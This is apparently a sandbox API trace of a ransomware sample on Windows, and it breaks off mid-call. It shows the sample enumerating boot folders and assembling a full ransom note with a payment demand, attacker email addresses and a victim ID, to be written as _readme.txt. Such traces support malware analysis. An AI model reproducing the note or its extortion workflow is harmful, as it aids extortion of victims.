[0227.518] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0227.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.519] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.519] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.519] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.520] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.520] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.520] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.520] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.520] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.521] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.526] HeapFree (in: hHeap=0x630000, 